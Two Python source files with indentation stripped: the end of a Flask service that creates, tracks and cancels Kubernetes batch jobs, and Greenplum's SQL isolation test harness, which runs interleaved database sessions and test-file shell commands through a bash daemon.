parameters['spec'], kube.client.V1PodSpec)
batch_id = parameters.get('batch_id')
if batch_id:
if batch_id not in batch_id_batch:
abort(404, 'valid request: batch_id {} not found'.format(batch_id))
job = Job(
pod_spec, batch_id, parameters.get('attributes'), parameters.get('callback'))
return jsonify(job.to_json())
@app.route('/jobs', methods=['GET'])
def get_job_list():
return jsonify([job.to_json() for _, job in job_id_job.items()])
@app.route('/jobs/<int:job_id>', methods=['GET'])
def get_job(job_id):
job = job_id_job.get(job_id)
if not job:
abort(404)
return jsonify(job.to_json())
@app.route('/jobs/<int:job_id>/log', methods=['GET'])
def get_job_log(job_id): # pylint: disable=R1710
if job_id > max_id():
abort(404)
job = job_id_job.get(job_id)
if job:
job_log = job._read_log()
if job_log:
return job_log
else:
fname = _log_path(job_id)
if os.path.exists(fname):
return _read_file(fname)
abort(404)
@app.route('/jobs/<int:job_id>/delete', methods=['DELETE'])
def delete_job(job_id):
job = job_id_job.get(job_id)
if not job:
abort(404)
job.delete()
return jsonify({})
@app.route('/jobs/<int:job_id>/cancel', methods=['POST'])
def cancel_job(job_id):
job = job_id_job.get(job_id)
if not job:
abort(404)
job.cancel()
return jsonify({})
class Batch:
def __init__(self, attributes):
self.attributes = attributes
self.id = next_id()
batch_id_batch[self.id] = self
self.jobs = []
def delete(self):
del batch_id_batch[self.id]
for j in self.jobs:
assert j.batch_id == self.id
j.batch_id = None
def to_json(self):
state_count = Counter([j._state for j in self.jobs])
return {
'id': self.id,
'jobs': {
'Created': state_count.get('Created', 0),
'Complete': state_count.get('Complete', 0),
'Cancelled': state_count.get('Cancelled', 0)
},
'attributes': self.attributes
}
@app.route('/batches/create', methods=['POST'])
def create_batch():
parameters = request.json
schema = {
'attributes': {
'type': 'dict',
'keyschema': {'type': 'string'},
'valueschema': {'type': 'string'}
}
}
validator = cerberus.Validator(schema)
if not validator.validate(parameters):
abort(404, 'invalid request: {}'.format(validator.errors))
batch = Batch(parameters.get('attributes'))
return jsonify(batch.to_json())
@app.route('/batches/<int:batch_id>', methods=['GET'])
def get_batch(batch_id):
batch = batch_id_batch.get(batch_id)
if not batch:
abort(404)
return jsonify(batch.to_json())
@app.route('/batches/<int:batch_id>/delete', methods=['DELETE'])
def delete_batch(batch_id):
batch = batch_id_batch.get(batch_id)
if not batch:
abort(404)
batch.delete()
return jsonify({})
def update_job_with_pod(job, pod):
if pod:
if pod.status.container_statuses:
assert len(pod.status.container_statuses) == 1
container_status = pod.status.container_statuses[0]
assert container_status.name == 'default'
if container_status.state and container_status.state.terminated:
job.mark_complete(pod)
else:
job.mark_unscheduled()
@app.route('/pod_changed', methods=['POST'])
def pod_changed():
parameters = request.json
pod_name = parameters['pod_name']
job = pod_name_job.get(pod_name)
if job and not job.is_complete():
try:
pod = v1.read_namespaced_pod(
pod_name,
POD_NAMESPACE,
_request_timeout=KUBERNETES_TIMEOUT_IN_SECONDS)
except kube.client.rest.ApiException as exc:
if exc.status == 404:
pod = None
else:
raise
update_job_with_pod(job, pod)
return '', 204
@app.route('/refresh_k8s_state', methods=['POST'])
def refresh_k8s_state():
log.info('started k8s state refresh')
pods = v1.list_namespaced_pod(
POD_NAMESPACE,
label_selector=f'app=batch-job,hail.is/batch-instance={instance_id}',
_request_timeout=KUBERNETES_TIMEOUT_IN_SECONDS)
seen_pods = set()
for pod in pods.items:
pod_name = pod.metadata.name
seen_pods.add(pod_name)
job = pod_name_job.get(pod_name)
if job and not job.is_complete():
update_job_with_pod(job, pod)
for pod_name, job in pod_name_job.items():
if pod_name not in seen_pods:
update_job_with_pod(job, None)
log.info('k8s state refresh complete')
return '', 204
def run_forever(target, *args, **kwargs):
# target should be a function
target_name = target.__name__
expected_retry_interval_ms = 15 * 1000
while True:
start = time.time()
try:
log.info(f'run_forever: run target {target_name}')
target(*args, **kwargs)
log.info(f'run_forever: target {target_name} returned')
except Exception: # pylint: disable=W0703
log.error(f'run_forever: target {target_name} threw exception', exc_info=sys.exc_info())
end = time.time()
run_time_ms = int((end - start) * 1000 + 0.5)
sleep_duration_ms = random.randrange(expected_retry_interval_ms * 2) - run_time_ms
if sleep_duration_ms > 0:
log.debug(f'run_forever: {target_name}: sleep {sleep_duration_ms}ms')
time.sleep(sleep_duration_ms / 1000.0)
def flask_event_loop():
app.run(threaded=False, host='0.0.0.0')
def kube_event_loop():
watch = kube.watch.Watch()
stream = watch.stream(
v1.list_namespaced_pod,
POD_NAMESPACE,
label_selector=f'app=batch-job,hail.is/batch-instance={instance_id}')
for event in stream:
pod = event['object']
name = pod.metadata.name
requests.post('http://127.0.0.1:5000/pod_changed', json={'pod_name': name}, timeout=120)
def polling_event_loop():
time.sleep(1)
while True:
try:
response = requests.post('http://127.0.0.1:5000/refresh_k8s_state', timeout=120)
response.raise_for_status()
except requests.HTTPError as exc:
log.error(f'Could not poll due to exception: {exc}, text: {exc.response.text}')
except Exception as exc: # pylint: disable=W0703
log.error(f'Could not poll due to exception: {exc}')
time.sleep(REFRESH_INTERVAL_IN_SECONDS)
def serve():
kube_thread = threading.Thread(target=run_forever, args=(kube_event_loop,))
kube_thread.start()
polling_thread = threading.Thread(target=run_forever, args=(polling_event_loop,))
polling_thread.start()
# debug/reloader must run in main thread
# see: https://stackoverflow.com/questions/31264826/start-a-flask-application-in-separate-thread
# flask_thread = threading.Thread(target=flask_event_loop)
# flask_thread.start()
run_forever(flask_event_loop)
kube_thread.join()
|
sql_isolation_testcase.py | """
Copyright (c) 2004-Present VMware, Inc. or its affiliates.
This program and the accompanying materials are made available under
the terms of the under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import pg
import pty
import os
import subprocess
import re
import multiprocessing
import tempfile
import time
import sys
import socket
from optparse import OptionParser
import traceback
import select
def is_digit(n):
try:
int(n)
return True
except ValueError:
return False
def null_notice_receiver(notice):
'''
Tests ignore notice messages when analyzing results,
so silently drop notices from the pg.connection
'''
return
class ConnectionInfo(object):
__instance = None
def __init__(self):
self.max_content_id = 0
if ConnectionInfo.__instance is not None:
raise Exception("ConnectionInfo is a singleton.")
query = ("SELECT content, hostname, port, role FROM gp_segment_configuration")
con = pg.connect(dbname="postgres")
self._conn_map = con.query(query).getresult()
con.close()
ConnectionInfo.__instance = self
for content, _, _, _ in ConnectionInfo.__instance._conn_map:
if content >= self.max_content_id:
self.max_content_id = content + 1
@staticmethod
def __get_instance():
if ConnectionInfo.__instance is None:
return ConnectionInfo()
return ConnectionInfo.__instance
@staticmethod
def get_hostname_port(name, role_name):
content_id = int(name)
conn_map = ConnectionInfo.__get_instance()._conn_map
max_content_id = ConnectionInfo.__get_instance().max_content_id
real_content_id = content_id % max_content_id if content_id >= 0 else content_id % (-max_content_id)
for content, host, port, role in conn_map:
if real_content_id == content and role == role_name:
return (host, port)
raise Exception("Cannont find a connection with content_id=%d, role=%c" % (content_id, role_name))
class GlobalShellExecutor(object):
BASH_PS1 = 'test_sh$>'
class ExecutionError(Exception):
""
pass
def __init__(self, output_file='', initfile_prefix=''):
self.output_file = output_file
self.initfile_prefix = initfile_prefix
self.v_cnt = 0
# open pseudo-terminal to interact with subprocess
self.master_fd, self.slave_fd = pty.openpty()
self.sh_proc = subprocess.Popen(['/bin/bash', '--noprofile', '--norc', '--noediting', '-i'],
stdin=self.slave_fd,
stdout=self.slave_fd,
stderr=self.slave_fd,
universal_newlines=True)
self.bash_log_file = open("%s.log" % self.initfile_prefix, "w+")
self.__run_command("export PS1='%s'" % GlobalShellExecutor.BASH_PS1)
self.__run_command("export PS2=''")
self.__run_command("source global_sh_executor.sh")
def terminate(self, with_error = False):
if self.sh_proc == None:
return
# If write the matchsubs section directly to the output, the generated token id will be compared by gpdiff.pl
# so here just write all matchsubs section into an auto generated init file when this test case file finished.
if not with_error and self.initfile_prefix != None and len(self.initfile_prefix) > 1:
output_init_file = "%s.ini" % self.initfile_prefix
cmd = ''' [ ! -z "${MATCHSUBS}" ] && echo "-- start_matchsubs ${NL} ${MATCHSUBS} ${NL}-- end_matchsubs" > %s ''' % output_init_file
self.exec_global_shell(cmd, False)
if self.bash_log_file:
self.bash_log_file.close()
try:
self.sh_proc.terminate()
except OSError as e:
# Ignore the exception if the process doesn't exist.
pass
self.sh_proc = None
def __run_command(self, sh_cmd):
# Strip the newlines at the end. It will be added later.
sh_cmd = sh_cmd.rstrip()
bytes_written = os.write(self.master_fd, sh_cmd.encode())
bytes_written += os.write(self.master_fd, b'\n')
output = ""
while self.sh_proc.poll() is None:
# If not returns in 10 seconds, consider it as an fatal error.
r, w, e = select.select([self.master_fd], [], [self.master_fd], 10)
if e:
# Terminate the shell when we get any output from stderr
o = os.read(self.master_fd, 10240)
self.bash_log_file.write(o)
self.bash_log_file.flush()
self.terminate(True)
raise GlobalShellExecutor.ExecutionError("Error happened to the bash daemon, see %s for details." % self.bash_log_file.name)
if r:
o = os.read(self.master_fd, 10240).decode()
self.bash_log_file.write(o)
self.bash_log_file.flush()
output += o
if o.endswith(GlobalShellExecutor.BASH_PS1):
lines = output.splitlines()
return lines[len(sh_cmd.splitlines()):len(lines) - 1]
if not r and not e:
self.terminate(True)
raise GlobalShellExecutor.ExecutionError("Timeout happened to the bash daemon, see %s for details." % self.bash_log_file.name)
self.terminate(True)
raise GlobalShellExecutor.ExecutionError("Bash daemon has been stopped, see %s for details." % self.bash_log_file.name)
# execute global shell cmd in bash deamon, and fetch result without blocking
def exec_global_shell(self, sh_cmd, is_trip_output_end_blanklines):
if self.sh_proc == None:
raise GlobalShellExecutor.ExecutionError("The bash daemon has been terminated abnormally, see %s for details." % self.bash_log_file.name)
# get the output of shell commmand
output = self.__run_command(sh_cmd)
if is_trip_output_end_blanklines:
for i in range(len(output)-1, 0, -1):
if len(output[i].strip()) == 0:
del output[i]
else:
break
return output
# execute gobal shell:
# 1) set input stream -> $RAW_STR
# 2) execute shell command from input
# if error, write error message to err_log_file
def exec_global_shell_with_orig_str(self, input, sh_cmd, is_trip_output_end_blanklines):
self.v_cnt = 1 + self.v_cnt
escape_in = input.replace('\'', "'\\''")
# send shell cmd and set the temp RAW_STR
cmd = ''' export RAW_STR%d='%s' && export RAW_STR=$RAW_STR%d && %s ; unset RAW_STR ''' % (
self.v_cnt, escape_in, self.v_cnt, sh_cmd)
return self.exec_global_shell(cmd, is_trip_output_end_blanklines)
# extrac shell shell, sql part from one line with format: @header '': SQL
# return row: (found the header or not?, the extracted shell, the SQL in the left part)
def extract_sh_cmd(self, header, input_str):
start = len(header)
is_start = False
end = 0
is_trip_comma = False
res_cmd = ""
res_sql = ""
input_str = input_str.lstrip()
if not input_str.startswith(header):
return (False, None, None)
for i in range(start, len(input_str)):
if end == 0 and input_str[i] == '\'':
if not is_start:
# find shell begin postion
is_start = True
start = i+1
continue
cnt = 0
for j in range(i-1, 0, -1):
if input_str[j] == '\\':
cnt = 1 + cnt
else:
break
if cnt % 2 == 1:
continue
# find shell end postion
res_cmd = input_str[start: i]
end = i
continue
if end != 0:
# skip space until ':'
if input_str[i] == ' ':
continue
elif input_str[i] == ':':
is_trip_comma = True
res_sql = input_str[i+1:]
break
if not is_start or end == 0 or not is_trip_comma:
raise Exception("Invalid format: %v", input_str)
#unescape \' to ' and \\ to '
res_cmd = res_cmd.replace('\\\'', '\'')
res_cmd = res_cmd.replace('\\\\', '\\')
return (True, res_cmd, res_sql)
class SQLIsolationExecutor(object):
def __init__(self, dbname=''):
self.processes = {}
# The re.S flag makes the "." in the regex match newlines.
# When matched against a command in process_command(), all
# lines in the command are matched and sent as SQL query.
self.command_pattern = re.compile(r"^(-?\d+|[*])([&\\<\\>URSMq]*?)\:(.*)", re.S)
if dbname:
self.dbname = dbname
else:
self.dbname = os.environ.get('PGDATABASE')
# To indicate the session has not been created or terminated.
class SessionError(Exception):
def __init__(self, name, mode, msg):
super(SQLIsolationExecutor.SessionError, self).__init__(msg)
self.name = name
self.mode = mode
class SQLConnection(object):
def __init__(self, out_file, name, mode, dbname, user = None, passwd = None):
self.name = name
self.mode = mode
self.out_file = out_file
self.dbname = dbname
self.user = user
self.passwd = passwd
parent_conn, child_conn = multiprocessing.Pipe(True)
self.p = multiprocessing.Process(target=self.session_process, args=(child_conn,))
self.pipe = parent_conn
self.has_open = False
self.p.start()
# Close "our" copy of the child's handle, so that if the child dies,
# recv() on the pipe will fail.
child_conn.close()
self.out_file = out_file
def session_process(self, pipe):
sp = SQLIsolationExecutor.SQLSessionProcess(self.name,
self.mode, pipe, self.dbname, user=self.user, passwd=self.passwd)
sp.do()
def query(self, command, post_run_cmd, global_sh_executor):
print(file=self.out_file)
self.out_file.flush()
if len(command.strip()) == 0:
return
if self.has_open:
raise Exception("Cannot query command while waiting for results")
self.pipe.send((command, False))
r = self.pipe.recv()
if r is None:
raise Exception("Execution failed")
if re.match(r"^#.*:", r):
raise SQLIsolationExecutor.SessionError(self.name, self.mode, r)
if post_run_cmd != None:
new_out = global_sh_executor.exec_global_shell_with_orig_str(r.rstrip(), post_run_cmd, True)
for line in new_out:
print(line.rstrip(), file=self.out_file)
else:
print(r.rstrip(), file=self.out_file)
def fork(self, command, blocking, global_sh_executor):
print(" <waiting ...>", file=self.out_file)
self.pipe.send((command, True))
if blocking:
time.sleep(0.5)
if self.pipe.poll(0):
p = self.pipe.recv()
raise Exception("Forked command is not blocking; got output: %s" % p.strip())
self.has_open = True
def join(self):
r = None
print(" <... completed>", file=self.out_file)
if self.has_open:
r = self.pipe.recv()
if r is None:
raise Exception("Execution failed")
print(r.rstrip(), file=self.out_file)
self.has_open = False
def stop(self):
self.pipe.send(("", False))
self.p.join()
if self.has_open:
raise Exception("Should not finish test case while waiting for results")
def quit(self):
print(" ... <quitting>", file=self.out_file)
self.stop()
def terminate(self):
self.pipe.close()
self.p.terminate()
class SQLSessionProcess(object):
def __init__(self, name, mode, pipe, dbname, user = None, passwd = None):
"""
Constructor
"""
self.name = name
self.mode = mode
self.pipe = pipe
self.dbname = dbname
self.passwd = passwd
self.user = user
# If there is an exception thrown when creating session, save it and send
# it to pipe when we get the first execute_command call.
self.create_exception = None
if self.mode == "utility":
(hostname, port) = self.get_hostname_port(name, 'p')
self.con = self.connectdb(given_dbname=self.dbname,
given_host=hostname,
given_port=port,
given_opt="-c gp_role=utility",
given_user=user,
given_passwd=passwd)
elif self.mode == "standby":
# Connect to standby even when its role is recorded
# as mirror. This is useful for scenarios where a
# test needs to promote a standby without using
# gpactivatestandby.
(hostname, port) = self.get_hostname_port(name, 'm')
self.con = self.connectdb(given_dbname=self.dbname,
given_host=hostname,
given_port=port,
given_user=user,
given_passwd=passwd)
elif self.mode == "retrieve":
(hostname, port) = ConnectionInfo.get_hostname_port(name, 'p')
self.con = self.connectdb(given_dbname=self.dbname,
given_host=hostname,
given_port=port,
given_opt="-c gp_retrieve_conn=true",
given_user=user,
given_passwd=passwd)
elif self.mode == "mirror":
# Connect to mirror even when it's role is recorded
# as mirror. This is useful for scenarios where a
# primary is marked down but could actually accept
# connection. This implies utility connection.
(hostname, port) = self.get_hostname_port(name, 'm')
self.con = self.connectdb(given_dbname=self.dbname,
given_host=hostname,
given_port=port,
given_opt="-c gp_role=utility")
else:
self.con = self.connectdb(self.dbname)
def connectdb(self, given_dbname, given_host = None, given_port = None, given_opt = None, given_user = None, given_passwd = None):
con = None
retry = 1000
while retry:
try:
if (given_port is None):
con = pg.connect(host= given_host,
opt= given_opt,
dbname= given_dbname,
user = given_user,
passwd = given_passwd)
else:
con = pg.connect(host= given_host,
port= given_port,
opt= given_opt,
dbname= given_dbname,
user = given_user,
passwd = given_passwd)
break
except Exception as e:
if self.mode == "retrieve" and ("auth token is invalid" in str(e) or "Authentication failure" in str(e) or "does not exist" in str(e)):
self.create_exception = e
break
elif (("the database system is starting up" in str(e) or
"the database system is in recovery mode" in str(e)) and
retry > 1):
retry -= 1
time.sleep(0.1)
else:
raise
if con is not None:
con.set_notice_receiver(null_notice_receiver)
return con
def get_hostname_port(self, contentid, role):
"""
Gets the port number/hostname combination of the
contentid and role
"""
query = ("SELECT hostname, port FROM gp_segment_configuration WHERE"
" content = %s AND role = '%s'") % (contentid, role)
con = self.connectdb(self.dbname, given_opt="-c gp_role=utility")
r = con.query(query).getresult()
con.close()
if len(r) == 0:
raise Exception("Invalid content %s" % contentid)
if r[0][0] == socket.gethostname():
return (None, int(r[0][1]))
return (r[0][0], int(r[0][1]))
def printout_result(self, r):
"""
Print out a pygresql result set (a Query object, after the query
has been executed), in a format that imitates the default
formatting of psql. This isn't a perfect imitation: we left-justify
all the fields and headers, whereas psql centers the header, and
right-justifies numeric fields. But this is close enough, to make
gpdiff.pl recognize the result sets as such. (We used to just call
str(r), and let PyGreSQL do the formatting. But even though
PyGreSQL's default formatting is close to psql's, it's not close
enough.)
"""
widths = []
# Figure out the widths of each column.
fields = r.listfields()
for f in fields:
widths.append(len(str(f)))
rset = r.getresult()
for row in rset:
colno = 0
for col in row:
if col is None:
col = ""
widths[colno] = max(widths[colno], len(str(col)))
colno = colno + 1
# Start printing. Header first.
result = ""
colno = 0
for f in fields:
if colno > 0:
result += "|"
result += " " + f.ljust(widths[colno]) + " "
colno = colno + 1
result += "\n"
# Then the bar ("----+----")
colno = 0
for f in fields:
if colno > 0:
result += "+"
result += "".ljust(widths[colno] + 2, "-")
colno = colno + 1
result += "\n"
# Then the result set itself
for row in rset:
colno = 0
for col in row:
if colno > 0:
result += "|"
if isinstance(col, float):
col = format(col, "g")
elif isinstance(col, bool):
if col:
col = 't'
else:
col = 'f'
elif col is None:
col = ""
result += " " + str(col).ljust(widths[colno]) + " "
colno = colno + 1
result += "\n"
# Finally, the row count
if len(rset) == 1:
result += "(1 row)\n"
else:
result += "(" + str(len(rset)) + " rows)\n"
return result
def execute_command(self, command):
"""
Executes a given command
"""
try:
r = self.con.query(command)
if r is not None:
if type(r) == str:
# INSERT, UPDATE, etc that returns row count but not result set
echo_content = command[:-1].partition(" ")[0].upper()
return "%s %s" % (echo_content, r)
else:
# SELECT or similar, print the result set without the command (type pg.Query)
return self.printout_result(r)
else:
# CREATE or other DDL without a result set or count
echo_content = command[:-1].partition(" ")[0].upper()
return echo_content
except Exception as e:
return str(e)
def do(self):
"""
Process loop.
Ends when the command None is received
"""
(c, wait) = self.pipe.recv()
while c:
if wait:
time.sleep(0.1)
if self.create_exception:
# When parent process received this, it should know the connection has not been
# created. Thus, the process entry should be cleared.
self.pipe.send("#%s%s> %s" % (self.name, self.mode, str(self.create_exception)))
else:
r = self.execute_command(c)
self.pipe.send(r)
r = None
(c, wait) = self.pipe.recv()
def get_process(self, out_file, name, mode="", dbname="", user=None, passwd=None):
"""
Gets or creates the process by the given name
"""
if len(name) > 0 and not is_digit(name):
raise Exception("Name should be a number")
if len(name) > 0 and mode != "utility" and int(name) >= 1024:
raise Exception("Session name should be smaller than 1024 unless it is utility mode number")
if not (name, mode) in self.processes:
if not dbname:
dbname = self.dbname
self.processes[(name, mode)] = SQLIsolationExecutor.SQLConnection(out_file, name, mode, dbname, user, passwd)
return self.processes[(name, mode)]
def quit_process(self, out_file, name, mode="", dbname=""):
"""
Quits a process with the given name
"""
if len(name) > 0 and not is_digit(name):
raise Exception("Name should be a number")
if len(name) > 0 and mode != "utility" and int(name) >= 1024:
raise Exception("Session name should be smaller than 1024 unless it is utility mode number")
if not (name, mode) in self.processes:
raise Exception("Sessions not started cannot be quit")
self.processes[(name, mode)].quit()
del self.processes[(name, mode)]
def get_all_primary_contentids(self, dbname):
"""
Retrieves all primary content IDs (including the master). Intended for
use by *U queries.
"""
if not dbname:
dbname = self.dbname
con = pg.connect(dbname=dbname)
result = con.query("SELECT content FROM gp_segment_configuration WHERE role = 'p' order by content").getresult()
if len(result) == 0:
raise Exception("Invalid gp_segment_configuration contents")
return [int(content[0]) for content in result]
def __preprocess_sql(self, name, pre_run_cmd, sql, global_sh_executor):
if not pre_run_cmd:
return sql
(hostname, port) = ConnectionInfo.get_hostname_port(name, 'p')
# Inject the current hostname and port to the shell.
global_sh_executor.exec_global_shell("GP_HOSTNAME=%s" % hostname, True)
global_sh_executor.exec_global_shell("GP_PORT=%s" % port, True)
sqls = global_sh_executor.exec_global_shell_with_orig_str(sql, pre_run_cmd, True)
if (len(sqls) != 1):
raise Exception("Invalid shell commmand: %v", sqls)
return sqls[0]
def __get_retrieve_user_token(self, name, global_sh_executor):
(hostname, port) = ConnectionInfo.get_hostname_port(name, 'p')
global_sh_executor.exec_global_shell("GP_HOSTNAME=%s" % hostname, True)
global_sh_executor.exec_global_shell("GP_PORT=%s" % port, True)
out= global_sh_executor.exec_global_shell("get_retrieve_token", True)
if (len(out) > 0):
token = out[0]
out = global_sh_executor.exec_global_shell("echo ${RETRIEVE_USER}", True)
if (len(out) > 0):
user = out[0]
return (user, token)
def process_command(self, command, output_file, global_sh_executor):
"""
Processes the given command.
The command at this point still includes the isolation behavior
flags, e.g. which session to use.
"""
process_name = ""
sql = command
flag = ""
con_mode = ""
dbname = ""
retrieve_token = None
retrieve_user = None
pre_run_cmd = None
post_run_cmd = None
m = self.command_pattern.match(command)
if m:
process_name = m.groups()[0]
flag = m.groups()[1]
if flag and flag[0] == "U":
con_mode = "utility"
elif flag and flag[0] == "S":
if len(flag) > 1:
flag = flag[1:]
con_mode = "standby"
elif flag and flag[0] == "R":
con_mode = "retrieve"
elif flag and flag[0] == "M":
con_mode = "mirror"
sql = m.groups()[2]
sql = sql.lstrip()
# If db_name is specifed , it should be of the following syntax:
# 1:@db_name <db_name>: <sql>
if sql.startswith('@db_name'):
sql_parts = sql.split(':', 2)
if not len(sql_parts) == 2:
raise Exception("Invalid syntax with dbname, should be of the form 1:@db_name <db_name>: <sql>")
if not sql_parts[0].startswith('@db_name'):
raise Exception("Invalid syntax with dbname, should be of the form 1:@db_name <db_name>: <sql>")
if not len(sql_parts[0].split()) == 2:
raise Exception("Invalid syntax with dbname, should be of the form 1:@db_name <db_name>: <sql>")
dbname = sql_parts[0].split()[1].strip()
if not dbname:
raise Exception("Invalid syntax with dbname, should be of the form 1:@db_name <db_name>: <sql>")
sql = sql_parts[1]
else:
(found_hd, pre_run_cmd, ex_sql) = global_sh_executor.extract_sh_cmd('@pre_run', sql)
if found_hd:
sql = ex_sql
else:
(found_hd, post_run_cmd, ex_sql) = global_sh_executor.extract_sh_cmd('@post_run', sql)
if found_hd:
sql = ex_sql
if not flag:
if sql.startswith('!'):
sql = sql[1:]
# Check for execution mode. E.g.
# !\retcode path/to/executable --option1 --option2 ...
#
# At the moment, we only recognize the \retcode mode, which
# ignores all program output in the diff (it's still printed)
# and adds the return code.
mode = None
if sql.startswith('\\'):
mode, sql = sql.split(None, 1)
if mode != '\\retcode':
raise Exception('Invalid execution mode: {}'.format(mode))
cmd_output = subprocess.Popen(sql.strip(), stderr=subprocess.STDOUT, stdout=subprocess.PIPE, shell=True)
stdout, _ = cmd_output.communicate()
print(file=output_file)
if mode == '\\retcode':
print('-- start_ignore', file=output_file)
print(stdout.decode(), file=output_file)
if mode == '\\retcode':
print('-- end_ignore', file=output_file)
print('(exited with code {})'.format(cmd_output.returncode), file=output_file)
else:
sql_new = self.__preprocess_sql(process_name, pre_run_cmd, sql.strip(), global_sh_executor)
self.get_process(output_file, process_name, con_mode, dbname=dbname).query(sql_new, post_run_cmd, global_sh_executor)
elif flag == "&":
self.get_process(output_file, process_name, con_mode, dbname=dbname).fork(sql.strip(), True, global_sh_executor)
elif flag == ">":
self.get_process(output_file, process_name, con_mode, dbname=dbname).fork(sql.strip(), False, global_sh_executor)
elif flag == "<":
if len(sql) > 0:
raise Exception("No query should be given on join")
self.get_process(output_file, process_name, con_mode, dbname=dbname).join()
elif flag == "q":
if len(sql) > 0:
raise Exception("No query should be given on quit")
self.quit_process(output_file, process_name, con_mode, dbname=dbname)
elif flag == "U":
if process_name == '*':
process_names = [str(content) for content in self.get_all_primary_contentids(dbname)]
else:
process_names = [process_name]
for name in process_names:
sql_new = self.__preprocess_sql(name, pre_run_cmd, sql.strip(), global_sh_executor)
self.get_process(output_file, name, con_mode, dbname=dbname).query(sql_new, post_run_cmd, global_sh_executor)
elif flag == "U&":
sql_new = self.__preprocess_sql(process_name, pre_run_cmd, sql.strip(), global_sh_executor)
self.get_process(output_file, process_name, con_mode, dbname=dbname).fork(sql_new, True, global_sh_executor)
elif flag == "U<":
if len(sql) > 0:
raise Exception("No query should be given on join")
self.get_process(output_file, process_name, con_mode, dbname=dbname).join()
elif flag == "Uq":
if len(sql) > 0:
raise Exception("No query should be given on quit")
self.quit_process(output_file, process_name, con_mode, dbname=dbname)
elif flag == "S":
sql_new = self.__preprocess_sql(process_name, pre_run_cmd, sql.strip(), global_sh_executor)
self.get_process(output_file, process_name, con_mode, dbname=dbname).query(sql_new, post_run_cmd, global_sh_executor)
elif flag == "R":
if process_name == '*':
process_names = [str(content) for content in self.get_all_primary_contentids(dbname)]
else:
process_names = [process_name]
for name in process_names:
try:
sql_new = self.__preprocess_sql(name, pre_run_cmd, sql.strip(), global_sh_executor)
(retrieve_user, retrieve_token) = self.__get_retrieve_user_token(name, global_sh_executor)
self.get_process(output_file, name, con_mode, dbname=dbname, user=retrieve_user, passwd=retrieve_token).query(sql_new, post_run_cmd, global_sh_executor)
except SQLIsolationExecutor.SessionError as e:
print (str(e), file=output_file)
self.processes[(e.name, e.mode)].terminate()
del self.processes[(e.name, e.mode)]
elif flag == "R&":
sql_new = self.__preprocess_sql(process_name, pre_run_cmd, sql.strip(), global_sh_executor)
(retrieve_user, retrieve_token) = self.__get_retrieve_user_token(process_name, global_sh_executor)
self.get_process(output_file, process_name, con_mode, dbname=dbname, user=retrieve_user, passwd=retrieve_token).fork(sql_new, True, global_sh_executor)
elif flag == "R<":
if len(sql) > 0:
raise Exception("No query should be given on join")
(retrieve_user, retrieve_token) = self.__get_retrieve_user_token(process_name, global_sh_executor)
self.get_process(output_file, process_name, con_mode, dbname=dbname, user=retrieve_user, passwd=retrieve_token).join()
elif flag == "Rq":
if len(sql) > 0:
raise Exception("No query should be given on quit")
self.quit_process(output_file, process_name, con_mode, dbname=dbname)
elif flag == "M":
self.get_process(output_file, process_name, con_mode, dbname=dbname).query(sql.strip(), post_run_cmd, global_sh_executor)
else:
raise Exception("Invalid isolation flag")
def process_isolation_file(self, sql_file, output_file, initfile_prefix):
"""
Processes the given sql file and writes the output
to output file
"""
shell_executor = GlobalShellExecutor(output_file, initfile_prefix)
try:
command = ""
newline = False
for line in sql_file:
# this logic replicates the python2 behavior of a trailing comma at the end of print
# i.e. ''' print >>output_file, line.strip(), '''
print((" " if command and not newline else "") + line.strip(), end="", file=output_file)
newline = False
if line[0] == "!":
command_part = line # shell commands can use -- for multichar options like --include
elif re.match(r";.*--", line) or re.match(r"^--", line):
command_part = line.partition("--")[0] # remove comment from line
else:
command_part = line
if command_part == "" or command_part == "\n":
print(file=output_file)
newline = True
elif re.match(r".*;\s*$", command_part) or re.match(r"^\d+[q\\<]:\s*$", line) or re.match(r"^-?\d+[SUR][q\\<]:\s*$", line):
command += command_part
try:
self.process_command(command, output_file, shell_executor)
except GlobalShellExecutor.ExecutionError as e:
# error in the daemon shell cannot be recovered
raise
except Exception as e:
print("FAILED: ", e, file=output_file)
command = ""
else:
command += command_part
for process in list(self.processes.values()):
process.stop()
except:
for process in list(self.processes.values()):
process.terminate()
shell_executor.terminate()
raise
finally:
for process in list(self.processes.values()):
process.terminate()
shell_executor.terminate()
class SQLIsolationTestCase:
"""
The isolation test case allows a fine grained control of interleaved
executing transactions. This is mainly used to test isolation behavior.
[<#>[flag]:] <sql> | ! <shell scripts or command>
#: either an integer indicating a unique session, or a content-id if
followed by U (for utility-mode connections) or R (for retrieve-mode
connection). In 'U' mode or 'R' mode, the
content-id can alternatively be an asterisk '*' to perform a
utility-mode/retrieve-mode query on the master and all primary segments.
If you want to create multiple connections to the same content-id, just
increase N in: "content-id + {gpdb segment node number} * N",
e.g. if gpdb cluster segment number is 3, then:
(1) the master utility connections can be: -1U, -4U, -7U;
(2) the seg0 connections can be: 0U, 3U, 6U;
(3) the seg1 connections can be: 1U, 4U, 7U;
(4) the seg2 connections can be: 2U, 5U, 8U;
flag:
&: expect blocking behavior
>: running in background without blocking
<: join an existing session
q: quit the given session without blocking
U: connect in utility mode to primary contentid from gp_segment_configuration
U&: expect blocking behavior in utility mode (does not currently support an asterisk target)
U<: join an existing utility mode session (does not currently support an asterisk target)
R|R&|R<: similar to 'U' meaning execept that the connect is in retrieve mode, here don't
thinking about retrieve mode authentication, just using the normal authentication directly.
An example is:
Execute BEGIN in transaction 1
Execute BEGIN in transaction 2
Execute INSERT in transaction 2
Execute SELECT in transaction 1
Execute COMMIT in transaction 2
Execute SELECT in transaction 1
The isolation tests are specified identical to sql-scripts in normal
SQLTestCases. However, it is possible to prefix a SQL line with
an tranaction identifier followed by a colon (":").
The above example would be defined by
1: BEGIN;
2: BEGIN;
2: INSERT INTO a VALUES (1);
1: SELECT * FROM a;
2: COMMIT;
1: SELECT * FROM a;
Blocking behavior can be tested by forking and joining.
1: BEGIN;
2: BEGIN;
1: DELETE FROM foo WHERE a = 4;
2&: DELETE FROM foo WHERE a = 4;
1: COMMIT;
2<:
2: COMMIT;
2& forks the command. It is executed in the background. If the
command is NOT blocking at this point, it is considered an error.
2< joins the background command and outputs the result of the
command execution.
Session ids should be smaller than 1024.
2U: Executes a utility command connected to port 40000.
One difference to SQLTestCase is the output of INSERT.
SQLTestCase would output "INSERT 0 1" if one tuple is inserted.
